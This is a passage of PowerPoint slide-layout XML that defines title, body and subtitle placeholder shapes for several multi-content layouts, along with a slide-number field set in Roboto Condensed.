          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="125" name="Shape 125"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609480" y="273600"/>
            <a:ext cx="10972440" cy="530784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AndObj">
  <p:cSld name="Title, 2 Content and Content">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="126" name="Shape 126"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="127" name="Shape 127"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609480" y="273600"/>
            <a:ext cx="10972440" cy="11448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128" name="Shape 128"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609480" y="1604520"/>
            <a:ext cx="535428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129" name="Shape 129"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609480" y="3682080"/>
            <a:ext cx="535428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130" name="Shape 130"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6231960" y="1604520"/>
            <a:ext cx="5354280" cy="397728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AndTwoObj">
  <p:cSld name="Title Content and 2 Content">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="131" name="Shape 131"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="132" name="Shape 132"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609480" y="273600"/>
            <a:ext cx="10972440" cy="11448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133" name="Shape 133"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609480" y="1604520"/>
            <a:ext cx="5354280" cy="397728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134" name="Shape 134"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6231960" y="1604520"/>
            <a:ext cx="535428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135" name="Shape 135"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6231960" y="3682080"/>
            <a:ext cx="535428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OverTx">
  <p:cSld name="Title, 2 Content over Content">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="136" name="Shape 136"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="137" name="Shape 137"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609480" y="273600"/>
            <a:ext cx="10972440" cy="11448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138" name="Shape 138"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609480" y="1604520"/>
            <a:ext cx="535428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139" name="Shape 139"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6231960" y="1604520"/>
            <a:ext cx="535428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140" name="Shape 140"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609480" y="3682080"/>
            <a:ext cx="1097244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OverTx">
  <p:cSld name="Title, Content over Content">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="141" name="Shape 141"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="142" name="Shape 142"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609480" y="273600"/>
            <a:ext cx="10972440" cy="11448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143" name="Shape 143"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609480" y="1604520"/>
            <a:ext cx="1097244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144" name="Shape 144"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609480" y="3682080"/>
            <a:ext cx="1097244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fourObj">
  <p:cSld name="Title, 4 Content">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="145" name="Shape 145"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="146" name="Shape 146"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609480" y="273600"/>
            <a:ext cx="10972440" cy="11448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147" name="Shape 147"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609480" y="1604520"/>
            <a:ext cx="535428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148" name="Shape 148"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6231960" y="1604520"/>
            <a:ext cx="535428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149" name="Shape 149"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6231960" y="3682080"/>
            <a:ext cx="535428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150" name="Shape 150"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609480" y="3682080"/>
            <a:ext cx="535428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6 Content">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="151" name="Shape 151"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="152" name="Shape 152"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609480" y="273600"/>
            <a:ext cx="10972440" cy="11448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153" name="Shape 153"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609480" y="1604520"/>
            <a:ext cx="353304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154" name="Shape 154"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4319640" y="1604520"/>
            <a:ext cx="353304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155" name="Shape 155"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8029800" y="1604520"/>
            <a:ext cx="353304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156" name="Shape 156"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8029800" y="3682080"/>
            <a:ext cx="353304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157" name="Shape 157"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="5" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4319640" y="3682080"/>
            <a:ext cx="353304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158" name="Shape 158"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="6" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609480" y="3682080"/>
            <a:ext cx="353304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Slide">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="162" name="Shape 162"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="163" name="Shape 163"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5351927" y="6276001"/>
            <a:ext cx="1285453" cy="354563"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:no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F9F9F9"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:fld id="{00000000-1234-1234-1234-123412341234}" type="slidenum">
              <a:rPr b="0" i="0" lang="ru-RU" sz="1400" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>‹#›</a:t>
            </a:fld>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Slide">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="164" name="Shape 164"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="165" name="Shape 165"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609480" y="273600"/>
            <a:ext cx="10972440" cy="11448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166" name="Shape 166"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609480" y="1604520"/>
            <a:ext cx="10972440" cy="397728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Content">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="167" name="Shape 167"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="168" name="Shape 168"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609480" y="273600"/>
            <a:ext cx="10972440" cy="11448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169" name="Shape 169"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609480" y="1604520"/>
            <a:ext cx="10972440" cy="397728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Title, 2 Content">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="15" name="Shape 15"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Shape 16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609480" y="273600"/>
            <a:ext cx="10972440" cy="11448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17" name="Shape 17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609480" y="1604520"/>
            <a:ext cx="5354280" cy="397728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18" name="Shape 18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6231960" y="1604520"/>
            <a:ext cx="5354280" cy="397728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Title, 2 Content">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="170" name="Shape 170"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="171" name="Shape 171"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609480" y="273600"/>
            <a:ext cx="10972440" cy="11448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172" name="Shape 172"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609480" y="1604520"/>
            <a:ext cx="5354280" cy="397728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173" name="Shape 173"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6231960" y="1604520"/>
            <a:ext cx="5354280" cy="397728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174" name="Shape 174"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="175" name="Shape 175"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609480" y="273600"/>
            <a:ext cx="10972440" cy="11448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Only">
  <p:cSld name="Centered Text">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="176" name="Shape 176"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="177" name="Shape 177"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609480" y="273600"/>
            <a:ext cx="10972440" cy="530784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AndObj">
  <p:cSld name="Title, 2 Content and Content">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="178" name="Shape 178"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="179" name="Shape 179"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609480" y="273600"/>
            <a:ext cx="10972440" cy="11448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180" name="Shape 180"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609480" y="1604520"/>
            <a:ext cx="535428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181" name="Shape 181"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609480" y="3682080"/>
            <a:ext cx="535428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182" name="Shape 182"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6231960" y="1604520"/>
            <a:ext cx="5354280" cy="397728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AndTwoObj">
  <p:cSld name="Title Content and 2 Content">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="183" name="Shape 183"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="184" name="Shape 184"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609480" y="273600"/>
            <a:ext cx="10972440" cy="11448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185" name="Shape 185"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609480" y="1604520"/>
            <a:ext cx="5354280" cy="397728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186" name="Shape 186"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6231960" y="1604520"/>
            <a:ext cx="535428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187" name="Shape 187"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6231960" y="3682080"/>
            <a:ext cx="535428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OverTx">
  <p:cSld name="Title, 2 Content over Content">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="188" name="Shape 188"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="189" name="Shape 189"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609480" y="273600"/>
            <a:ext cx="10972440" cy="11448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190" name="Shape 190"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609480" y="1604520"/>
            <a:ext cx="535428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191" name="Shape 191"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6231960" y="1604520"/>
            <a:ext cx="535428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192" name="Shape 192"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609480" y="3682080"/>
            <a:ext cx="1097244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OverTx">
  <p:cSld name="Title, Content over Content">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="193" name="Shape 193"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="194" name="Shape 194"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609480" y="273600"/>
            <a:ext cx="10972440" cy="11448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195" name="Shape 195"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609480" y="1604520"/>
            <a:ext cx="1097244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196" name="Shape 196"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609480" y="3682080"/>
            <a:ext cx="1097244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fourObj">
  <p:cSld name="Title, 4 Content">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="197" name="Shape 197"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="198" name="Shape 198"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609480" y="273600"/>
            <a:ext cx="10972440" cy="11448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199" name="Shape 199"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609480" y="1604520"/>
            <a:ext cx="535428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200" name="Shape 200"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6231960" y="1604520"/>
            <a:ext cx="535428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201" name="Shape 201"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6231960" y="3682080"/>
            <a:ext cx="535428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202" name="Shape 202"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609480" y="3682080"/>
            <a:ext cx="535428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6 Content">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="203" name="Shape 203"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="204" name="Shape 204"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609480" y="273600"/>
            <a:ext cx="10972440" cy="11448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205" name="Shape 205"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609480" y="1604520"/>
            <a:ext cx="353304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206" name="Shape 206"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4319640" y="1604520"/>
            <a:ext cx="353304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207" name="Shape 207"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8029800" y="1604520"/>
            <a:ext cx="353304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208" name="Shape 208"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8029800" y="3682080"/>
            <a:ext cx="353304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209" name="Shape 209"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="5" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4319640" y="3682080"/>
            <a:ext cx="353304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210" name="Shape 210"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="6" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609480" y="3682080"/>
            <a:ext cx="353304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Slide">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="215" name="Shape 215"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="216" name="Shape 216"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5351927" y="6276001"/>
            <a:ext cx="1285453" cy="354563"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:no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F9F9F9"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
